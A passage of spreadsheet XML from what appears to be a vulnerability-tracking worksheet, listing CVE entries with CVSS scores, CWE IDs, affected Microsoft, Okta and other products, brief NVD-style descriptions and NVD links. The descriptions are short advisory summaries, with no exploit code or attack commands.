          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L778" s="5" t="inlineStr"/>
      <c r="M778" s="5" t="inlineStr"/>
      <c r="N778" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O778" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P778" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q778" s="5" t="inlineStr"/>
      <c r="R778" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="S778" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T778" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77494</t>
        </is>
      </c>
    </row>
    <row r="779">
      <c r="A779" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B779" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C779" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77498</t>
        </is>
      </c>
      <c r="D779" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E779" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F779" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G779" s="5" t="inlineStr"/>
      <c r="H779" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I779" s="5" t="inlineStr"/>
      <c r="J779" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K779" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L779" s="5" t="inlineStr"/>
      <c r="M779" s="5" t="inlineStr"/>
      <c r="N779" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O779" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P779" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q779" s="5" t="inlineStr"/>
      <c r="R779" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S779" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T779" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77498</t>
        </is>
      </c>
    </row>
    <row r="780">
      <c r="A780" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B780" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C780" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77499</t>
        </is>
      </c>
      <c r="D780" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E780" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F780" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G780" s="5" t="inlineStr"/>
      <c r="H780" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I780" s="5" t="inlineStr"/>
      <c r="J780" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K780" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L780" s="5" t="inlineStr"/>
      <c r="M780" s="5" t="inlineStr"/>
      <c r="N780" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O780" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P780" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q780" s="5" t="inlineStr"/>
      <c r="R780" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="S780" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T780" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77499</t>
        </is>
      </c>
    </row>
    <row r="781">
      <c r="A781" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B781" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C781" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77501</t>
        </is>
      </c>
      <c r="D781" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E781" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F781" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G781" s="5" t="inlineStr"/>
      <c r="H781" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I781" s="5" t="inlineStr"/>
      <c r="J781" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K781" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L781" s="5" t="inlineStr"/>
      <c r="M781" s="5" t="inlineStr"/>
      <c r="N781" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O781" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P781" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q781" s="5" t="inlineStr"/>
      <c r="R781" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S781" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T781" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77501</t>
        </is>
      </c>
    </row>
    <row r="782">
      <c r="A782" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B782" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C782" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77502</t>
        </is>
      </c>
      <c r="D782" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E782" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F782" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G782" s="5" t="inlineStr"/>
      <c r="H782" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I782" s="5" t="inlineStr"/>
      <c r="J782" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K782" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L782" s="5" t="inlineStr"/>
      <c r="M782" s="5" t="inlineStr"/>
      <c r="N782" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O782" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P782" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q782" s="5" t="inlineStr"/>
      <c r="R782" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S782" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T782" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77502</t>
        </is>
      </c>
    </row>
    <row r="783">
      <c r="A783" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B783" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C783" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77886</t>
        </is>
      </c>
      <c r="D783" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E783" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F783" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G783" s="5" t="inlineStr"/>
      <c r="H783" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I783" s="5" t="inlineStr"/>
      <c r="J783" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K783" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L783" s="5" t="inlineStr"/>
      <c r="M783" s="5" t="inlineStr"/>
      <c r="N783" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O783" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P783" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q783" s="5" t="inlineStr"/>
      <c r="R783" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S783" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T783" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77886</t>
        </is>
      </c>
    </row>
    <row r="784">
      <c r="A784" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B784" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C784" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77888</t>
        </is>
      </c>
      <c r="D784" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E784" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F784" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G784" s="5" t="inlineStr"/>
      <c r="H784" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I784" s="5" t="inlineStr"/>
      <c r="J784" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K784" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L784" s="5" t="inlineStr"/>
      <c r="M784" s="5" t="inlineStr"/>
      <c r="N784" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O784" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P784" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q784" s="5" t="inlineStr"/>
      <c r="R784" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="S784" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T784" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77888</t>
        </is>
      </c>
    </row>
    <row r="785">
      <c r="A785" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B785" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C785" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77889</t>
        </is>
      </c>
      <c r="D785" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E785" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F785" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G785" s="5" t="inlineStr"/>
      <c r="H785" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I785" s="5" t="inlineStr"/>
      <c r="J785" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K785" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L785" s="5" t="inlineStr"/>
      <c r="M785" s="5" t="inlineStr"/>
      <c r="N785" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O785" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P785" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q785" s="5" t="inlineStr"/>
      <c r="R785" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="S785" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T785" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77889</t>
        </is>
      </c>
    </row>
    <row r="786">
      <c r="A786" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B786" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C786" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77890</t>
        </is>
      </c>
      <c r="D786" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E786" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F786" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G786" s="5" t="inlineStr"/>
      <c r="H786" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I786" s="5" t="inlineStr"/>
      <c r="J786" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K786" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L786" s="5" t="inlineStr"/>
      <c r="M786" s="5" t="inlineStr"/>
      <c r="N786" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O786" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P786" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q786" s="5" t="inlineStr"/>
      <c r="R786" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="S786" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T786" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77890</t>
        </is>
      </c>
    </row>
    <row r="787">
      <c r="A787" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B787" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C787" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77893</t>
        </is>
      </c>
      <c r="D787" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E787" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F787" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G787" s="5" t="inlineStr"/>
      <c r="H787" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I787" s="5" t="inlineStr"/>
      <c r="J787" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K787" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L787" s="5" t="inlineStr"/>
      <c r="M787" s="5" t="inlineStr"/>
      <c r="N787" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O787" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P787" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q787" s="5" t="inlineStr"/>
      <c r="R787" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S787" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T787" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77893</t>
        </is>
      </c>
    </row>
    <row r="788">
      <c r="A788" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B788" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C788" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77895</t>
        </is>
      </c>
      <c r="D788" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E788" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F788" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G788" s="5" t="inlineStr"/>
      <c r="H788" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I788" s="5" t="inlineStr"/>
      <c r="J788" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K788" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L788" s="5" t="inlineStr"/>
      <c r="M788" s="5" t="inlineStr"/>
      <c r="N788" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O788" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P788" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q788" s="5" t="inlineStr"/>
      <c r="R788" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S788" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T788" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77895</t>
        </is>
      </c>
    </row>
    <row r="789">
      <c r="A789" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B789" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C789" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77898</t>
        </is>
      </c>
      <c r="D789" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E789" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F789" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G789" s="5" t="inlineStr"/>
      <c r="H789" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I789" s="5" t="inlineStr"/>
      <c r="J789" s="5" t="inlineStr"/>
      <c r="K789" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L789" s="5" t="inlineStr"/>
      <c r="M789" s="5" t="inlineStr"/>
      <c r="N789" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O789" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P789" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q789" s="5" t="inlineStr"/>
      <c r="R789" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S789" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T789" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77898</t>
        </is>
      </c>
    </row>
    <row r="790">
      <c r="A790" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B790" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C790" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78523</t>
        </is>
      </c>
      <c r="D790" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E790" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F790" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G790" s="5" t="inlineStr"/>
      <c r="H790" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I790" s="5" t="inlineStr"/>
      <c r="J790" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K790" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L790" s="5" t="inlineStr"/>
      <c r="M790" s="5" t="inlineStr"/>
      <c r="N790" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O790" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P790" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q790" s="5" t="inlineStr"/>
      <c r="R790" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S790" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T790" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78523</t>
        </is>
      </c>
    </row>
    <row r="791">
      <c r="A791" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B791" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C791" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78574</t>
        </is>
      </c>
      <c r="D791" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E791" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F791" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G791" s="5" t="inlineStr"/>
      <c r="H791" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I791" s="5" t="inlineStr"/>
      <c r="J791" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="K791" s="5" t="inlineStr"/>
      <c r="L791" s="5" t="inlineStr"/>
      <c r="M791" s="5" t="inlineStr"/>
      <c r="N791" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O791" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P791" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q791" s="5" t="inlineStr"/>
      <c r="R791" s="5" t="inlineStr">
        <is>
          <t>CWE-426</t>
        </is>
      </c>
      <c r="S791" s="5" t="inlineStr">
        <is>
          <t>The Okta Hyperdrive Integration plugin resolves a required assembly using a registry path within the current user's hive without integrity verification. The referenced path is loaded via Assembly.LoadFrom without signature validation, resulting in an unverified assembly executing within the context of the host process or elevated installer.</t>
        </is>
      </c>
      <c r="T791" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78574</t>
        </is>
      </c>
    </row>
    <row r="792">
      <c r="A792" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B792" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C792" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78837</t>
        </is>
      </c>
      <c r="D792" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E792" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F792" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G792" s="5" t="inlineStr"/>
      <c r="H792" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I792" s="5" t="inlineStr"/>
      <c r="J792" s="5" t="inlineStr"/>
      <c r="K792" s="5" t="inlineStr"/>
      <c r="L792" s="5" t="inlineStr"/>
      <c r="M792" s="5" t="inlineStr"/>
      <c r="N792" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O792" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P792" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q792" s="5" t="inlineStr"/>
      <c r="R792" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S792" s="5" t="inlineStr">
        <is>
          <t>A SQL injection vulnerability in the ap_form_{id} parameter in AppNitro MachForm v30 allows attackers to access sensitive database information via a crafted SQL statement.</t>
        </is>
      </c>
      <c r="T792" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78837</t>
        </is>
      </c>
    </row>
    <row r="793">
      <c r="A793" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B793" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C793" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79377</t>
        </is>
      </c>
      <c r="D793" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E793" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F793" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G793" s="5" t="inlineStr"/>
      <c r="H793" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I793" s="5" t="inlineStr"/>
      <c r="J793" s="5" t="inlineStr"/>
      <c r="K793" s="5" t="inlineStr"/>
      <c r="L793" s="5" t="inlineStr"/>
      <c r="M793" s="5" t="inlineStr"/>
      <c r="N793" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O793" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P793" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q793" s="5" t="inlineStr"/>
      <c r="R793" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S793" s="5" t="inlineStr">
        <is>
          <t>A heap overflow in the a2dp_decoder_sbc.cpp component of Bestechnic Co., Ltd BES2300 Bluetooth Audio SoC firmware v3.x and earlier allows attackers to cause a Denial of Service (DoS) via sending a crafted L2CAP packet.</t>
        </is>
      </c>
      <c r="T793" s="6" t="inlineStr">
        <is>
